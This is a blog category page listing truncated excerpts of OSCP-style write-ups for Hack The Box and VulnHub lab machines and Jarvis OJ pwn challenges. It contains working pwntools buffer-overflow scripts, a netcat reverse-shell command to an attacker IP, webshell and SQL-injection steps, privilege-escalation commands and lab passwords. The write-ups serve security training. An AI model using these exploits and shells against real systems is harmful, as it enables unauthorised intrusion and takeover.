oscp
文章平均质量分 89
王嘟嘟_
这个作者很懒,什么都没留下…
展开
-
oscp——htb——Mirai
0x00 前言这道题感觉很多人做了,应该不会很难,所以找找自信,来试试这道题0x01 信息收集原创 2020-08-06 19:22:30 · 524 阅读 · 0 评论 -
oscp——htb—— Nineveh
0x00 前言0x01 信息收集0x02 过程看到页面突然想起这个题之前应该是做过的。这里全程可以参考这个https://blog.csdn.net/qq_36869808/article/details/104094830原创 2020-08-05 20:30:51 · 414 阅读 · 0 评论 -
oscp——bof——brainpan
0x00 前言学习brainpan,这个是看了前辈的教程才做出来的。前辈地址:https://blog.csdn.net/zhalang8324/article/details/904775240x01 Wp看了oscp的教程但是感觉始终不得其道,所以想要练习练习。总结了一下流程,emmm基本就是以下流程确定偏移量确定JMP ESP确定badcharshellcode加上其实还是有很多疑问的这里ida看到了这个跟进,发现是一个strcpy的缓存区溢出但是有一个问题就是,这里原创 2020-08-04 10:52:22 · 625 阅读 · 0 评论 -
oscp——htb——Blocky
0x00 前言0x01 信息收集0x02 Web——Webshell这个机子是我第一次遇到这种,也算是涨经验了吧看到是一个wp的站,马上使用wpscan这里知道了一个新的东西http://10.10.10.37/plugins/ 这个文件夹下居然有东西看一下jar包,发现账号密码,根据wp的扫描用户 notch进行登录使用 notch/8YsqfCTnvxAUeduzjNSXe22 登录0x02 Webshell——Rootshell...原创 2020-08-03 16:11:07 · 377 阅读 · 0 评论 -
oscp——htb——Calamity(只做了一半)
0x00 前言0x01 信息收集这里开了80端口0x02 Web——Webshell扫目录发现一个admin账号然后狗的是F12可以获取到密码????然后登录成功admin/skoupidotenekes这里可以执行一个php文件<?php system("id")?>...原创 2020-08-01 17:07:07 · 271 阅读 · 0 评论 -
jarvisoj——Test Your Memory
题目Wp基本项检查,32位,开了NX,got表可写这里看到alphanum_2626和mem_test跟进mem_test,可以看到是scanf这里可以看到偏移,直接上payload这里一定要有返回地址,不然程序奔溃之后看不到flagfrom pwn import *sh = remote("pwn2.jarvisoj.com",9876)e=ELF('./TestYourMemory')sys_addr=e.symbols['system']cat_flag_addr=e原创 2020-07-31 13:07:24 · 761 阅读 · 2 评论 -
jarvisoj——Guess
题目Wp查一下基础项这道题卡了很久,实际上最核心的是 char数组 129时=-1前面这些通过socket进行连接,和主题无关看到head可以看到这里才是关键的地方看到这里可以知道,实际上就是把bin_by_hex值和flag进行对比内存中bin_by_hex和flag相差0x40我们可以通过char数组溢出的方法进行查看falg,129=-1,依次类推然后再对flag进行爆破from pwn import *io = remote('pwn.jarvisoj.com',原创 2020-07-30 15:40:33 · 363 阅读 · 0 评论 -
oscp——htb——Europa
0x00 前言0x01 信息收集0x02 Web——Webshell原创 2020-07-27 17:48:02 · 340 阅读 · 0 评论 -
oscp——htb——Bank
0x00 前言0x01 信息收集0x02 Web——Webshell这里看到53 DNS开放,而且web是apache默认页面,应该是要进行一个域名的绑定。这里为什么是bank.htb,我也不知道为啥,找了半天也没找到缘由。10.10.10.29 bank.htb www.bank.htb ns.bank.htb chris.bank.htb这里跑目录发现一个http://bank.htb/support.php访问一下,将302改为200这里从burp来看可以看的很清楚这里上原创 2020-07-21 11:40:31 · 354 阅读 · 0 评论 -
oscp——htb——Haircut
0x00 前言0x01 信息收集0x02 Web——Webshell访问看到这种10个有9个要扫目录,找到了一个exposed.php这里可以看到执行了一个curl的命令上一个马。拿到一个shell0x03 Webshell——RootShell获取一下suid,看到一个screen,这个之前vulhub做过一次,有笔记。提权www-data@haircut:/tmp$ cd /etcwww-data@haircut:/etc$ chmod +x /tmp/root原创 2020-07-20 10:43:21 · 382 阅读 · 0 评论 -
jarvisoj——[XMAN]]level2(x64)
题目Wp这里检查一下基础项这里看了一下,发现还是read这里出现了问题,需要进行覆盖构造一下payloadfrom pwn import *r=process("./level2_x64")#r=remote('pwn2.jarvisoj.com',9882)e=ELF('./level2_x64')sys_addr=e.symbols['system']bin_addr=e.search("/bin/sh").next()pop_rdi=0x4006b3payload='原创 2020-07-19 17:36:04 · 374 阅读 · 0 评论 -
jarvisoj——[XMAN]level4
题目Wp检查基础项,有NX保护ida看的时候还是之前的那种,但是没有给lib,需要自己去找那么这里第一步,肯定是找到system的地址第二步将/bin/sh写入bss字段第三部调用即可原创 2020-07-19 17:35:05 · 431 阅读 · 0 评论 -
jarvisoj——[XMAN]level3
题目Wp查一下常规,开了NX,NX开了之后就不能执行自己的shellcode了。ida看一下,依旧是这里存在缓存区溢出首先填充字段就是’A’*88+‘B’*4然后找到system的地址 00040310readelf -s libc-2.19.so |grep system返回地址随便,现在找参数bin,现在可以看到是162d4cstrings -atx libc-2.19.so |grep /bin现在还需要使用write来读出真实的offectfrom pwn imp原创 2020-07-19 17:33:49 · 311 阅读 · 0 评论 -
jarvisoj——[XMAN]level2
题目Wp查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。ida看一下常规的调用,然后看vulnerable_function函数很明显的read缓存区溢出,溢出大小为0x88很好玩的是这个题中有/bin/sh,地址为0x0804A024最后溢出结果就是0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数那么最后脚本就是:from pwn import *sh=remote("pwn2.jarvisoj.co原创 2020-07-16 02:53:07 · 295 阅读 · 0 评论 -
jarvisoj——[XMAN]level1
题目Wp先查一下基本的内容可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了这里可以看到print打印了buf的地址这里写一个pwntools的脚本from pwn import *sh = remote("pwn2.jarvisoj.com",9877)shellcode = asm(shellcraft.i386.原创 2020-07-15 01:00:10 · 427 阅读 · 1 评论 -
jarvisoj——[XMAN]level0
题目Wp拿下来之后发现是一个64位的,直接开idamain函数,现在对main函数已经很熟悉了这里看到一个方法这里按照规则覆盖即可。脚本from pwn import *sh=remote("pwn2.jarvisoj.com","9881")data="A"*136+p64(0x400596)sh.sendline(data)sh.interactive()sh.close()...原创 2020-07-14 23:26:18 · 355 阅读 · 0 评论 -
jarvisoj——Tell Me Something
本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。题目Wp这里首先下载,然后ida打开,看到main函数main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。然后这里可以看到有一个good_gaem可以看到是读取了一个flag.txt的文件。那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。最后就是先覆盖136的自身,然后加上good_game的地址即可。pwntoolsfro原创 2020-07-14 23:24:38 · 561 阅读 · 0 评论 -
oscp——htb——Joker
0x00 前言这个机子可以了解到Squid相关的知识,如果不是这个机子,我可能都不可能会接触到这个东西。0x01 信息收集0x02 Web——Webshell这里有一个3128开放,我找了历史漏洞但是都没有利用成功。最后才知道可以将3128当做代理。但是我linux本地又有问题,所以只能使用ew进行端口的正向映射出来。但是代理挂好之后要求输入密码,那么这里要从另外一个方面入手了。使用tftp进行连接然后获取squid相关内容/etc/squid/squid.conf/etc/squ原创 2020-07-14 17:37:42 · 527 阅读 · 0 评论 -
oscp——htb——Sneaky(未完成待续)
0x00 前言0x01 信息收集扫目录可以发现一个dev0x02 Web访问之后发现是一个登录界面,使用万能密码发现可以直接进去这里得到两个账号admin,thrasivoulos点击my key,可以得到一个私钥但是机器没有开启22ssh,好了我自己走到这里就卡死了。...原创 2020-07-07 14:57:42 · 298 阅读 · 0 评论 -
oscp——htb——Lazy
0x00 前言0x01 信息收集0x02 Web原创 2020-06-29 17:06:21 · 11805 阅读 · 0 评论 -
oscp——htb——Brainfuck(环境问题,未完待续)
0x00 前言0x01 信息收集root@kali:~# nmap 10.10.10.17Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-29 01:06 EDTNmap scan report for brainfuck.htb (10.10.10.17)Host is up (0.29s latency).Not shown: 995 filtered portsPORT STATE SERVICE22/tcp open原创 2020-06-29 13:47:11 · 567 阅读 · 0 评论 -
oscp——htb——Tenten
0x00 前言0x01 信息收集0x02 Web——USershell首先来看下80端口的内容,可以看到是一个wp的站点使用wpscan扫描获取到一个插件job-manager,还有一个用户名:takis暂时无可利用的地方,这个看到这里发现如下的内容这里看到8,应该是可以遍历的使用burp进行遍历,发现在13的地方出现问题,这种应该是参数13的意思这里知道有一个job-manager的洞,CVE-2015-6668,找到了文件的路径http://10.10.10.10/wp原创 2020-06-16 16:40:07 · 441 阅读 · 0 评论 -
oscp——HTB——Cronos
0x00 前言0x01 信息收集0x02 Web——Webshell这里开放了80端口,发现80端口没啥东西,扫目录也没扫出来啥。看到开放了53端口,知道是开启了dns服务使用nslookupnslookupserver 10.10.10.1310.10.10.13这类可以看到10.10.10.13的相对应的域名查看一下其他的域名dig axfr cronos.htb @10.10.10.13这里可以看到还有其他的域测试admin.cronos.htb,发现这里是一个原创 2020-06-02 16:02:42 · 432 阅读 · 0 评论 -
oscp——HTB——Optimum
0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell访问一下目标站点,看到是HFS搜一下payload发现可以直接使用msf打过去拿到shell之后就可以拿到user的flag这里我用cs又建立了一个稳定的连接0x03 Webshell——Rootshell首先systeminfo获取一下信息,然后使用Windows-Exploit-Suggester进行扫描使用MS16-098进行提权...原创 2020-05-25 17:26:38 · 538 阅读 · 0 评论 -
oscp——HTB——Bastard
0x00 前言难度入门1级0x01 信息收集0x02 Web——Webshell这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell使用脚本直接getshell0x03 Webshell——Rootshell传一个nc 上去然后反弹一个shellnc.exe -e cmd 10.10.14.6 1234这里可以使用Sherlock先进行扫描。powershell.exe -exec bypass -Command "& {Imp原创 2020-05-20 20:40:32 · 551 阅读 · 0 评论 -
oscp——HTB——Devel
0x00 前言难度入门1级0x01 信息收集这里可以看到开了21和80扫一下21,由于我这里有一点问题,所以21得重新扫一下0x02 21——Webshell本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的访问test.txt进行测试这里使用msf生成一个aspx的马,然后直接put上传msf监听,访问cs.aspx会弹回来一个shell原创 2020-05-19 15:55:00 · 370 阅读 · 0 评论 -
oscp——HTB——Beep
0x00 前言难度入门1级0x01 信息收集0x02 Web——Rootshell先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入搜索一下Elastix的历史漏洞首先看到了一个LFI的洞,下载下来,然后看一下利用payload进行测试这里找到了一个admin的密码jEhdIekWmdjE可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。...原创 2020-05-09 15:24:58 · 498 阅读 · 0 评论 -
oscp——HTB——Popcorn
0x00 前言难度入门2级0x01 信息收集这里开放了22和800x02 Web——Webshell看到这里是一个test,果断扫目录。拿到目录:http://10.10.10.6/testhttp://10.10.10.6/torrent/先看一下test,phpinfo的界面访问http://10.10.10.6/torrent/ 可以看到是一个torrent的站,先注册一个账号然后上传一个torrent然后这里上传成功这里上传文件,并使用burp拦截,并且修改原创 2020-05-09 14:32:12 · 538 阅读 · 0 评论 -
oscp——HTB——Legacy
0x00 前言乘着网好,赶紧做一做。难度入门 1级 (基本没啥难度)0x01 信息收集常规上nmap看了一下目标版本,这里是2003看到这里看到445以及版本,永恒之蓝没得跑了。0x02 usershell and rootshell可以直接开启msf,进行搜索search smb获取到shell首先是找到user.txt然后找到root.txt...原创 2020-04-26 15:25:05 · 543 阅读 · 0 评论 -
oscp——HTB—— Lame
0x00 前言vulnhub下载,搞环境搞的人心累,还不如试试HTB~难度入门 1级 (基本没啥难度)0x01 信息收集常规扫端口,网太卡了,所以使用先扫常规,然后再进行定点扫描。0x02 usershell and rootshell我是做完之后回来写的,这里可以直接拿到两个flag看到samba,拿msf 看一下版本use auxiliary/scanner/smb/s...原创 2020-04-13 13:21:14 · 609 阅读 · 0 评论 -
oscp——PRIMER: 1.0.1
0x00 目标资料43链接https://www.vulnhub.com/entry/primer-101,136/难度推荐 1Web——UserShell 1环境搭建VM0x01 信息收集IP端口0x02 Web——UserShell照例,访问一下Web的站点,看看是啥样子的。看到一个登录框,这里直接检测sql注入,可以看到是存在注入的。这里本来在test下...原创 2020-03-17 15:08:49 · 389 阅读 · 2 评论 -
oscp——vulnhub目录总览
0x00 前言这里记录并且导航已经完成的vulnhub文章,不提供任何提示。0x01 目录1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。...原创 2020-03-16 16:12:28 · 799 阅读 · 0 评论 -
oscp——vulnhub目录总览(提示&知识点总结)
0x00 前言这里记录并且导航已经完成的vulnhub文章,拥有提示以及&知识点总结0x01 目录1.Me and My Girlfriend 1 有一部分偏ctf,但是除去ctf部分,当做简单练习足够。提示提示一:修改x-forwarded-for头提示二:ssh爆破提示三:sudo -l知识点越权ssh爆破凡是用户名相同,则密码很大概率相同sudo -...原创 2020-03-16 16:12:22 · 708 阅读 · 0 评论 -
oscp——/dev/random: Pipe
0x00 目标资料42链接https://www.vulnhub.com/entry/devrandom-pipe,124/难度推荐 4Web——Webshell 2Webshell——Rootshell 2环境搭建VMbox0x01 信息收集IP端口0x02 Web——Webshell首先访问一下目标的Web页面,看到了是一个需要登录的地方。这里尝试使用pos...原创 2020-03-15 18:53:45 · 385 阅读 · 0 评论 -
oscp——NullByte: 1
0x00 目标资料 41链接https://www.vulnhub.com/entry/nullbyte-1,126/难度推荐 4Web——Usershell 3Usershell——Rootshell 1环境搭建VMbox0x01 信息收集IP端口0x02 Web——Usershell这里访问一下web照例扫一下目标的目录这里可以看到有一个phpmyadm...原创 2020-03-14 15:05:10 · 428 阅读 · 0 评论 -
oscp——Tr0ll: 1
# 0x00 目标资料## 链接https://www.vulnhub.com/entry/tr0ll-1,100/## 难度推荐 5- 思路 2- Web80——UserShell 2- UserShell——Rootshel 1## 环境搭建- VM...原创 2020-03-12 18:02:09 · 351 阅读 · 0 评论 -
oscp——Hell: 1
0x00 目标资料 39链接https://www.vulnhub.com/entry/hell-1,95/难度推荐 3环境搭建VMbox0x01 信息收集IP端口0x02 Web首先访问一下web页面对目标进行一下目录遍历,发现如下目录这里的manual是一个apache的默认目录personal内容如下还有一个robots.txt 文件访问一下这里访...原创 2020-03-03 19:20:53 · 1591 阅读 · 0 评论 -
oscp——SecOS: 1
0x00 目标资料 38链接https://www.vulnhub.com/entry/secos-1,88/难度推荐 3思路 1web——usershell 1usershell——rootshell 1环境搭建VMbox0x01 信息收集IP端口0x02 Web——Usershell拿到之后,访问一下8081端口然后看到一个注册的界面,进行用户的注册,...原创 2020-03-01 20:30:56 · 1506 阅读 · 0 评论 -
oscp——Bot Challenges: RA1NXing Bots
0x00 目标资料 37链接https://www.vulnhub.com/entry/bot-challenges-ra1nxing-bots,52/难度推荐 3思路 1web——webshell 1.5webshell——rootshel 0.5环境搭建vmbox0x01 信息收集IPmasscan 192.168.124.1/24 --ping --rate 1...原创 2020-02-28 15:24:56 · 1574 阅读 · 0 评论 -
oscp——Kioptrix: Level 1.3 (#4)
0x00 目标资料 36链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/难度推荐 4思路 1端口 0.5web——usershell 1usershell——rootshell 1.5环境搭建VMware下载下来之后是一个vmdx的文件,所以要经过处理这里新建一个虚拟机,选择其他移除原来的硬盘加载下...原创 2020-02-28 13:54:02 · 992 阅读 · 0 评论